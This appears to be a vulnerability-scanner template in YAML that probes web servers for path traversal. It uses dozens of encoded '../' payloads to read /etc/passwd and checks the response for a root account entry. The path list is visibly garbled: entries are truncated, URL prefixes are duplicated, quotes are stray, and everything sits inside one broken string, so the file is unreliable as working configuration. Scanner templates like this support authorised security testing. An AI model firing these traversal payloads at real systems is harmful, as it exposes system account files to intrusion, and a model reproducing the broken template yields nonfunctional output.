id: Etc-file-6
info:
  author: Saimon
  description: Finds etc password files
  name: Etc File Read
  severity: high
requests:
- matchers:
  - status:
    - 200
    type: status
  - part: body
    regex:
    - root:[x*] :0:0
    - \[(font|extension|file)s\]
    type: regex
  matchers-condition: and
  method: GET
  path:
  - '-  "{{BaseURL}}swd"

    -  "{{BaseURL}}passwd"

    -  "{{BaseURL}}tc/passwd{{BaseURL}}"

    -  "{{BaseURL}}"

    -  "{{BaseURL}}"

    -  "{{BaseURL}}asswd"

    -  "{{BaseURL}}etc/passwd"

    -  "{{BaseURL}}.%2f/etc/passwd"

    -  "{{BaseURL}}.%2f..%2f/etc/passwd"

    -  "{{BaseURL}}.%2f..%2f..%2f/etc/passwd"

    -  "{{BaseURL}}""

    -  "

    -  "{{BaseURL}}passwd"

    -  "{{BaseURL}}e//etc/passwd"

    -  "{{BaseURL}}e/%2e%2e//etc/passwd"

    -  "{{BaseURL}}e/%2e%2e/%2e%2e//etc/passwd"

    -  "{{BaseURL}}e/%2e%2e/%2e%2e/%2e%2e//etc/passwd"

    -  "{{BaseURL}}e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd{{BaseURL}}""

    -  "

    -  "{{BaseURL}}swd"

    -  "{{BaseURL}}f/etc/passwd"

    -  "{{BaseURL}}f%2e%2e%2f/etc/passwd"

    -  "{{BaseURL}}f%2e%2e%2f%2e%2e%2f/etc/passwd"

    -  "{{BaseURL}}f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd"

    -  "{{BaseURL}}f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd"

    -  "{{BaseURL}}f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd{{BaseURL}}"

    -  "{{BaseURL}}""

    -  "

    -  "{{BaseURL}}passwd"

    -  "{{BaseURL}}2f/etc/passwd"

    -  "{{BaseURL}}2f..%252f/etc/passwd"

    -  "{{BaseURL}}2f..%252f..%252f/etc/passwd"

    -  "{{BaseURL}}2f..%252f..%252f..%252f/etc/passwd"

    -  "{{BaseURL}}2f..%252f..%252f..%252f..%252f/etc/passwd{{BaseURL}}""

    -  "

    -  "{{BaseURL}}/passwd"

    -  "{{BaseURL}}e%252e//etc/passwd"

    -  "{{BaseURL}}e%252e/%252e%252e//etc/passwd"

    -  "{{BaseURL}}e%252e/%252e%252e/%252e%252e//etc/passwd"

    -  "{{BaseURL}}e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd"

    -  "{{BaseURL}}e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd"

    -  "{{BaseURL}}e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd{{BaseURL}}""

    -  "

    -  "{{BaseURL}}252f/etc/passwd"

    -  "{{BaseURL}}252f%252e%252e%252f/etc/passwd"

    -  "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f/etc/passwd"

    -  "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd"

    -  "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd"

    -  "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd"

    -  "{{BaseURL}}252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd{{BaseURL}}"

    -  "{{BaseURL}}"

    -  "{{BaseURL}}"

    -  "{{BaseURL}}"

    -  "{{BaseURL}}""

    -  "

    -  "{{BaseURL}}swd"

    -  "{{BaseURL}}passwd"

    -  "{{BaseURL}}tc/passwd{{BaseURL}}"

    -  "{{BaseURL}}""

    -  "

    -  "{{BaseURL}}passwd"

    -  "{{BaseURL}}5c/etc/passwd"

    -  "{{BaseURL}}5c..%255c/etc/passwd"

    -  "{{BaseURL}}5c..%255c..%255c/etc/passwd"

    -  "{{BaseURL}}5c..%255c..%255c..%255c/etc/passwd"

    -  "{{BaseURL}}5c..%255c..%255c..%255c..%255c/etc/passwd{{BaseURL}}""

    -  "

    -  "{{BaseURL}}/passwd..%5c/etc/passwd{{BaseURL}}"

    -  "{{BaseURL}}""

    -  "

    -  "{{BaseURL}}asswd"

    -  "{{BaseURL}}etc/passwd"

    -  "{{BaseURL}}.%5c/etc/passwd"

    -  "{{BaseURL}}.%5c..%5c/etc/passwd"

    -  "{{BaseURL}}.%5c..%5c..%5c/etc/passwd{{BaseURL}}"

    -  "{{BaseURL}}""

    -  "

    -  "{{BaseURL}}passwd"

    -  "{{BaseURL}}e\/etc/passwd"

    -  "{{BaseURL}}e\%2e%2e\/etc/passwd"

    '
